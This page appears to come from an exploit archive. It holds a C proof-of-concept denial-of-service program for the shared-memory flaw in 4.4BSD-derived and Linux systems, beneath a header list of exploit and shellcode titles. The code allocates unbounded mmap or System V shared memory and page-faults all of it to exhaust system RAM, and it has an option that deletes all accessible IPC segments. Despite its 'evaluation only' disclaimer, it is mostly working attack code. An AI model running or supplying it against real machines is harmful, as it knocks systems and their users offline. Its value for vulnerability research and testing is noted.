
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
243 lines
No EOL
6.3 KiB
C
243 lines
No EOL
6.3 KiB
C
/*
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source: https://www.securityfocus.com/bid/526/info
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Operating systems with a shared memory implementation based on or influenced by the 4.4BSD code may be vulnerable to a denial of service attack The problem exists because you can mmap() or shmget() as much memory as you'd like bypassing rlimits. When you trigger pagefaults, the system will begin allocating the memory (it's not actually allocated at first) and run out. With System V IPC the memory remains allocated even after the process has stopped running.
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*/
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/*
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* This program can be used to exploit DoS bugs in the VM systems or utility
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* sets of certain OS's.
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*
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* Common problems:
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* 1. The system does not check rlimits for mmap and shmget (FreeBSD)
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* 2. The system never bothers to offer the ability to set the rlimits for
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* virtual memory via shells, login process, or otherwise. (Linux)
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* 3. b. The system does not actually allocate shared memory until a page fault
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* is triggered (this could be argued to be a feature - Linux, *BSD)
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* a. The system does not watch to make sure you don't share more memory
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* than exists. (Linux, Irix, BSD?)
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* 4. With System V IPC, shared memory persists even after the process is
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* gone. So even though the kernel may kill the process after it exhausts all
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* memory from page faults, there still is 0 memory left for the system.
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* (All)
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*
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* This program should compile on any architecture. SGI Irix is not
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* vulnerable. From reading The Design and Implementation of 4.4BSD it sounds
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* as if the BSDs should all be vulnerable. FreeBSD will mmap as much memory
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* as you tell it. I haven't tried page faulting the memory, as the system is
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* not mine. I'd be very interested to hear about OpenBSD...
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*
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* This program is provided for vulnerability evaluation ONLY. DoS's aren't
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* cool, funny, or anything else. Don't use this on a machine that isn't
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* yours!!!
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*/
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#include <stdio.h>
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#include <errno.h>
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#include <sys/ipc.h>
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#include <sys/shm.h> /* redefinition of LBA.. PAGE_SIZE in both cases.. */
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#ifdef __linux__
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#include <asm/shmparam.h>
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#include <asm/page.h>
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#endif
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#include <sys/types.h>
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#include <stdio.h>
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#include <sys/stat.h>
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#include <sys/fcntl.h>
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#include <sys/mman.h>
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int len;
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#define __FUXX0R_MMAP__
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/* mmap also implements the copy-on-fault mechanism, but because the only way
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* to easily exploit this is to use anonymous mappings, once the kernel kills
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* the offending process, you can recover. (Although swap death may still
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* occurr */
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/* #define __FUXX0R_MMAP__ */
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/* Most mallocs use mmap to allocate large regions of memory. */
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/* #define __FUXX0R_MMAP_MALLOC__ */
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/* Guess what this option does :) */
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#define __REALLY_FUXX0R__
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/* From glibc 2.1.1 malloc/malloc.c */
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#define DEFAULT_MMAP_THRESHOLD (128 * 1024)
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#ifndef PAGE_SIZE
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# define PAGE_SIZE 4096
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#endif
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#ifndef SHMSEG
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# define SHMSEG 256
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#endif
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#if defined(__FUXX0R_MMAP_MALLOC__)
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void *mymalloc(int n)
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{
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if(n <= DEFAULT_MMAP_THRESHOLD)
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n = DEFAULT_MMAP_THRESHOLD + 1;
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return malloc(n);
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}
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void myfree(void *buf)
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{
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free(buf);
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}
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#elif defined(__FUXX0R_MMAP__)
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void *mymalloc(int n)
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{
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int fd;
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void *ret;
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fd = open("/dev/zero", O_RDWR);
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ret = mmap(0, n, PROT_READ|PROT_WRITE, MAP_PRIVATE, fd, 0);
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close(fd);
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return (ret == (void *)-1 ? NULL : ret);
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}
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void myfree(void *buf)
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{
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munmap(buf, len);
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}
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#elif defined(__FUXX0R_SYSV__)
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void *mymalloc(int n)
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{
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char *buf;
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static int i = 0;
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int shmid;
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i++; /* 0 is IPC_PRIVATE */
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if((shmid = shmget(i, n, IPC_CREAT | SHM_R | SHM_W)) == -1)
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{
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#if defined(__irix__)
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if (shmctl (shmid, IPC_RMID, NULL))
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{
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perror("shmctl");
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}
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#endif
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return NULL;
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}
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if((buf = shmat(shmid, 0, 0)) == (char *)-1)
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{
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#if defined(__irix__)
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if (shmctl (shmid, IPC_RMID, NULL))
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{
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perror("shmctl");
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}
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#endif
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return NULL;
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}
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#ifndef __REALLY_FUXX0R__
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if (shmctl (shmid, IPC_RMID, NULL))
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{
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perror("shmctl");
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}
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#endif
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return buf;
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}
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void myfree(void *buf)
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{
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shmdt(buf);
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}
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#endif
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#ifdef __linux__
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void cleanSysV()
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{
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struct shmid_ds shmid;
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struct shm_info shm_info;
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int id;
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int maxid;
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int ret;
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int shid;
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maxid = shmctl (0, SHM_INFO, (struct shmid_ds *) &shm_info);
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printf("maxid %d\n", maxid);
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for (id = 0; id <= maxid; id++)
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{
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if((shid = shmctl (id, SHM_STAT, &shmid)) < 0)
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continue;
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if (shmctl (shid, IPC_RMID, NULL))
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{
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perror("shmctl");
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}
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printf("id %d has %d attachments\n", shid, shmid.shm_nattch);
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shmid.shm_nattch = 0;
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shmctl(shid, IPC_SET, &shmid);
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if(shmctl(shid, SHM_STAT, &shmid) < 0)
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{
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printf("id %d deleted sucessfully\n", shid);
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}
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else if(shmid.shm_nattch == 0)
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{
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printf("Still able to stat id %d, but has no attachments\n", shid);
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}
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else
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{
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printf("Error, failed to remove id %d!\n", shid);
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}
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}
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}
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#endif
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int main(int argc, char **argv)
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{
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int shmid;
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int i = 0;
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char *buf[SHMSEG * 2];
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int max;
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int offset;
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if(argc < 2)
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{
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printf("Usage: %s <[0x]size of segments>\n", argv[0]);
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#ifdef __linux__
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printf(" or %s --clean (destroys all of IPC space you have permissions to)\n", argv[0]);
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#endif
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exit(0);
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}
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#ifdef __linux__
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if(!strcmp(argv[1], "--clean"))
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{
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cleanSysV();
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exit(0);
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}
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#endif
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len = strtol(argv[1], NULL, 0);
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for(buf[i] = mymalloc(len); i < SHMSEG * 2 && buf[i] != NULL; buf[++i] = mymalloc(len))
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;
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max = i;
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perror("Stopped because");
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printf("Maxed out at %d %d byte segments\n", max, len);
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#if defined(__FUXX0R_SYSV__) && defined(SHMMNI)
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printf("Despite an alleged max of %d (%d per proc) %d byte segs. (Page "
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"size: %d), \n", SHMMNI, SHMSEG, SHMMAX, PAGE_SIZE);
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#endif
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#ifdef __REALLY_FUXX0R__
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fprintf(stderr, "Page faulting alloced region... Have a nice life!\n");
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for(i = 0; i < max; i++)
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{
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for(offset = 0; offset < len; offset += PAGE_SIZE)
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{
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buf[i][offset] = '*';
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}
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printf("wrote to %d byes of memory, final offset %d\n", len, offset);
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}
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// never reached :(
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#else
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for(i = 0; i <= max; i++)
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{
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myfree(buf[i]);
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}
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#endif
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exit(42);
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} |